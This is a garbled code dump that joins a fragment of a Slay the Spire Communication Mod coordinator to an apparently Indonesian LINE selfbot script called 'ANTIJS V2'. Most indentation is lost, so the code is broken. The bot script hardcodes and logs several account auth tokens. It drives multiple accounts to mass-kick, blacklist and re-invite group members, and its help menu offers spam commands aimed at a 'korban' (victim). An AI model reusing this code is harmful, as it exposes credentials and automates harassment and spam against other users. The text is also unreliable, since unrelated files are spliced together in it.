                stdin_input += input_char
        input_queue.put(stdin_input)
def write_stdout(output_queue):
"""Read lines from a queue and write them to stdout
:param output_queue: A queue, from which this function will receive lines of text
:type output_queue: queue.Queue
:return: None
"""
while True:
output = output_queue.get()
logging.debug('Write: {}'.format(output))
print(output, end='\n', flush=True)
class Coordinator:
"""An object to coordinate communication with Slay the Spire"""
def __init__(self):
self.input_queue = queue.Queue()
self.output_queue = queue.Queue()
self.input_thread = threading.Thread(target=read_stdin, args=(self.input_queue,))
self.output_thread = threading.Thread(target=write_stdout, args=(self.output_queue,))
self.input_thread.daemon = True
self.input_thread.start()
self.output_thread.daemon = True
self.output_thread.start()
self.action_queue = collections.deque()
self.state_change_callback = None
self.out_of_game_callback = None
self.error_callback = None
self.game_is_ready = False
self.stop_after_run = False
self.in_game = False
self.last_game_state = None
self.last_error = None
def signal_ready(self):
"""Indicate to Communication Mod that setup is complete
Must be used once, before any other commands can be sent.
:return: None
"""
# print('signal ready')
self.send_message("ready")
def send_message(self, message):
"""Send a command to Communication Mod and start waiting for a response
:param message: the message to send
:type message: str
:return: None
"""
self.output_queue.put(message)
self.game_is_ready = False
def get_next_raw_message(self, block=False):
"""Get the next message from Communication Mod as a string
:param block: set to True to wait for the next message
:type block: bool
:return: the message from Communication Mod
:rtype: str
"""
if block or not self.input_queue.empty():
return self.input_queue.get()
coordinator = Coordinator()
coordinator.signal_ready()
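# Minimal poll loop: read raw messages from Communication Mod and log them.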
while True:
    message = coordinator.get_next_raw_message(False)
    if message is not None:
        logging.debug('Read: {}'.format(message))
    else:
        # Avoid spinning while the input queue is empty
        time.sleep(0.05)
|
Ts.py
|
import BONDS
from BONDS import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, shutil, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, wikipedia  # shutil is needed by the photo-update handler below
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
from googletrans import Translator
import youtube_dl
#ANTIJS_V2
#cl = LineClient()
cl = LineClient(authToken='EymhbepN62xaDhMQLfM8.h0dLm9gzqKE1Oaznh1hgAa.cocrfOGN7URnCRvJ5ZnA4sWr40p+yISKiHticmPYpks=')
cl.log("Auth Token : " + str(cl.authToken))
channel = LineChannel(cl)
cl.log("Channel Access Token : " + str(channel.channelAccessToken))
#ki = LineClient()
ki = LineClient(authToken='Ey3Vz2obFmqvVX2xRIp9.nuUU5kRRG+fC3Z9YVNv7Qq.40qkn3p0xm6O/u8xbQBYutJVGj0UlbePwU9fk0vzBro=')
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
#kk = LineClient()
kk = LineClient(authToken='EyrwkRraUDS5hzuuLpl2.buJLD7JrrngDnMf5qDfqyG.34qAnJQZDGnM84k2v+yuHYzLWva/nCxqY25chvjSiuI=')
kk.log("Auth Token : " + str(kk.authToken))
channel2 = LineChannel(kk)
kk.log("Channel Access Token : " + str(channel2.channelAccessToken))
#kc = LineClient()
kc = LineClient(authToken='EyA71IJPTno5dqWNQsCf.9eQsWmyR4F9AFNPZDyQTtW.Vape/NVypwUnT7am1EiDPef9ZGs4LkNIM6HCbU7VThA=')
kc.log("Auth Token : " + str(kc.authToken))
channel3 = LineChannel(kc)
kc.log("Channel Access Token : " + str(channel3.channelAccessToken))
#sw = LineClient()
sw = LineClient(authToken='EyrSPsIqPmpphh5j5rW3.TrVjFf5pyd8D+ZxPusvq0W./HG61gK46XwunolGSUq545YSdnBXBX+4vOCydOcGqRo=')
sw.log("Auth Token : " + str(sw.authToken))
channel11 = LineChannel(sw)
sw.log("Channel Access Token : " + str(channel11.channelAccessToken))
poll = LinePoll(cl)
call = cl
creator = ["u1f40e533d1994247b5a0064d1f51c668"]
owner = ["u1f40e533d1994247b5a0064d1f51c668"]
admin = ["u1f40e533d1994247b5a0064d1f51c668"]
staff = ["u1f40e533d1994247b5a0064d1f51c668"]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Zmid = sw.getProfile().mid
KAC = [cl]
ABC = [sw]
Bots = [mid,Zmid]
Dpk = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
protectantijs = []
ghost = []
welcome = []
responsename1 = cl.getProfile().displayName
responsename2 = cl.getProfile().displayName
responsename3 = cl.getProfile().displayName
settings = {
"Picture":False,
"group":{},
"groupPicture":False,
"changePicture":False,
"autoJoinTicket":False,
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
]
}
wait = {
"limit": 1,
"owner":{},
"admin":{},
"addadmin":False,
"delladmin":False,
"staff":{},
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":True,
"contact":False,
'autoJoin':True,
'autoAdd':True,
'autoRead':False,
'autoLeave':False,
'autoLeave1':False,
"detectMention":True,
"Mentionkick":False,
"welcomeOn":False,
"sticker":False,
"selfbot":True,
"mention":"SINI KAK GABUNG NAPA NGINTIP BAE 😊",
"Respontag":"Woy Tag Bae Gak Punya Kerjaan Lo Yaa",
"welcome":"Selamat datang & semoga betah",
"comment":"Like like & like by ghovin87",
"message":"Terimakasih sudah add saya 😃",
}
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
with open('creator.json', 'r') as fp:
creator = json.load(fp)
with open('owner.json', 'r') as fp:
owner = json.load(fp)
Setbot = codecs.open("setting.json","r","utf-8")
Setmain = json.load(Setbot)
mulai = time.time()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def restartBot():
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def mentionMembers(to, mid):
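    # Builds a chat message that @-mentions every mid in `mid`: each MENTIONEES
    # entry records the Start/End offsets of an "@x" placeholder plus the member id (M).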
try:
arrData = ""
textx = "Total Mention User「{}」\n\n [ Mention ]\n1. ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "Total Sider User「{}」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "Total Member Masuk「{}」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+"\nNama grup : "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = cl.getAllContactIds()
gid = cl.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"◐ Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\n⏩ Group : "+str(len(gid))+"\n⏩ Teman : "+str(len(teman))+"\n⏩ Expired : In "+hari+"\n⏩ Version : ANTIJS2\n⏩ Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\n⏩ Runtime : \n • "+bot
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = "❧MENU HELP❧\n" + \
"π" "Me\n" + \
"π" "Mid「@」\n" + \
"π" "Info「@」\n" + \
"π" "Nk「@」\n" + \
"π" "Kick1「@」\n" + \
"π" "Mybot\n" + \
"π" "Status\n" + \
"π" "About\n" + \
"π" "Restart\n" + \
"π" "Runtime\n" + \
"π" "Creator\n" + \
"π" "Speed/Sp\n" + \
"π" "Sprespon\n" + \
"π" "Tagall\n" + \
"π" "Joinall\n" + \
"π" "Byeall\n" + \
"π" "Byeme\n" + \
"π" "Leave「Namagrup」\n" + \
"π" "Ginfo\n" + \
"π" "Open\n" + \
"π" "Close\n" + \
"π" "Url grup\n" + \
"π" "Gruplist\n" + \
"π" "Infogrup「angka」\n" + \
"π" "Infomem「angka」\n" + \
"π" "Remove chat\n" + \
"π" "Lurking「on/off」\n" + \
"π" "Lurkers\n" + \
"π" "Sider「on/off」\n" + \
"π" "Updatefoto\n" + \
"π" "Updategrup\n" + \
"π" "Updatebot\n" + \
"π" "Broadcast:「Text」\n" + \
"π" "Setkey「New Key」\n" + \
"π" "Mykey\n" + \
"π" "Resetkey\n" + \
"π" "ID line:「Id Line nya」\n" + \
"π" "Sholat:「Nama Kota」\n" + \
"π" "Cuaca:「Nama Kota」\n" + \
"π" "Lokasi:「Nama Kota」\n" + \
"π" "Music:「Judul Lagu」\n" + \
"π" "Lirik:「Judul Lagu」\n" + \
"π" "Ytmp3:「Judul Lagu」\n" + \
"π" "Ytmp4:「Judul Video」\n" + \
"π" "Profileig:「Nama IG」\n" + \
"π" "Cekdate:「tgl-bln-thn」\n" + \
"π" "Jumlah:「angka」\n" + \
"π" "Spamtag「@」\n" + \
"π" "Spamcall:「jumlahnya」\n" + \
"π" "Spamcall\n" + \
"π" "Notag「on/off」\n" + \
"π" "Allpro「on/off」\n" + \
"π" "Protecturl「on/off」\n" + \
"π" "Protectjoin「on/off」\n" + \
"π" "Protectkick「on/off」\n" + \
"π" "Protectcancel「on/off」\n" + \
"π" "Antijs「on/off」\n" + \
"π" "Antijs stay\n" + \
"π" "Ghost「on/off」\n" + \
"π" "Sticker「on/off」\n" + \
"π" "Respon「on/off」\n" + \
"π" "Contact「on/off」\n" + \
"π" "Autojoin「on/off」\n" + \
"π" "Autoadd「on/off」\n" + \
"π" "Welcome「on/off」\n" + \
"π" "Autoleave「on/off」\n" + \
"π" "Admin:on\n" + \
"π" "Admin:repeat\n" + \
"π" "Staff:on\n" + \
"π" "Staff:repeat\n" + \
"π" "Bot:on\n" + \
"π" "Bot:repeat\n" + \
"π" "Adminadd「@」\n" + \
"π" "Admindell「@」\n" + \
"π" "Staffadd「@」\n" + \
"π" "Staffdell「@」\n" + \
"π" "Botadd「@」\n" + \
"π" "Botdell「@」\n" + \
"π" "Refresh\n" + \
"π" "Listbot\n" + \
"π" "Listadmin\n" + \
"π" "Listprotect\n" + \
"♠Yang Betul Nulis Nya♠"
return helpMessage
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = "♣HELP BOT♣\n" + \
"°" "Blc\n" + \
"°" "Ban:on\n" + \
"°" "Unban:on\n" + \
"°" "Ban「@」\n" + \
"°" "Unban「@」\n" + \
"°" "Talkban「@」\n" + \
"°" "Untalkban「@」\n" + \
"°" "Talkban:on\n" + \
"°" "Untalkban:on\n" + \
"°" "Banlist\n" + \
"°" "Talkbanlist\n" + \
"°" "Clearban\n" + \
"°" "Refresh\n" + \
"°" "Cek sider\n" + \
"°" "Cek spam\n" + \
"°" "Cek pesan \n" + \
"°" "Cek respon \n" + \
"°" "Cek welcome\n" + \
"°" "Set sider:「Text」\n" + \
"°" "Set spam:「Text」\n" + \
"°" "Set pesan:「Text」\n" + \
"°" "Set respon:「Text」\n" + \
"°" "Set welcome:「Text」\n" + \
"°" "Myname:「Nama」\n" + \
"°" "Bot1name:「Nama」\n" + \
"°" "Bot2name:「Nama」\n" + \
"°" "Bot3name:「Nama」\n" + \
"°" "Bot1up「Kirim fotonya」\n" + \
"°" "Bot2up「Kirim fotonya」\n" + \
"°" "Bot3up「Kirim fotonya」\n" + \
"°" "Gift:「Mid korban」「Jumlah」\n" + \
"°" "Spam:「Mid korban」「Jumlah」\n" + \
"°♦ANTI JS V-2♦°"
return helpMessage1
def bot(op):
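    # Main event handler: dispatches LINE operations by op.type as used below
    # (11 group-ticket changes, 13 invitations, 17 joins, 19 kicks,
    #  32 cancelled invites, 55 read events, 25/26 chat messages, 5 new contacts).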
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 11:
if op.param1 in protectqr:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if kk.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.reissueGroupTicket(op.param1)
X = kk.getGroup(op.param1)
X.preventedJoinByTicket = True
kk.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if kc.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.reissueGroupTicket(op.param1)
X = kc.getGroup(op.param1)
X.preventedJoinByTicket = True
kc.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " +str(ginfo.name))
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " + str(ginfo.name))
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kk.leaveGroup(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
kk.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kc.leaveGroup(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = ki.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = kk.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kk.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = kc.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kc.cancelGroupInvitation(op.param1,[_mid])
except:
pass
if op.type == 17:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
welcomeMembers(op.param1, [op.param2])
cl.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if (wait["message"] in [" "," ","\n",None]):
pass
else:
cl.sendText(op.param1, wait["message"])
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 19:
try:
if op.param1 in ghost:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
if op.type == 19:
try:
if op.param1 in protectantijs:
if op.param3 in mid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
sw.acceptGroupInvitation(op.param1)
G = sw.getGroup(op.param1)
G.preventedJoinByTicket = False
sw.updateGroup(G)
Ticket = sw.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = True
sw.updateGroup(G)
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
cl.inviteIntoGroup(op.param1,[Zmid])
                            cl.inviteIntoGroup(op.param1,admin)
else:
pass
if op.param3 in Zmid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
else:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if op.param3 in admin:
if op.param1 in protectantijs:
wait["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.sendMessage(op.param1,"=Admin Invited=")
else:
pass
except:
pass
#-------------------------------------------------------------------------------
if op.type == 32:
if op.param1 in protectcancel:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.kickoutFromGroup(op.param1,[op.param2])
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.kickoutFromGroup(op.param1,[op.param2])
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
pass
return
if Bmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
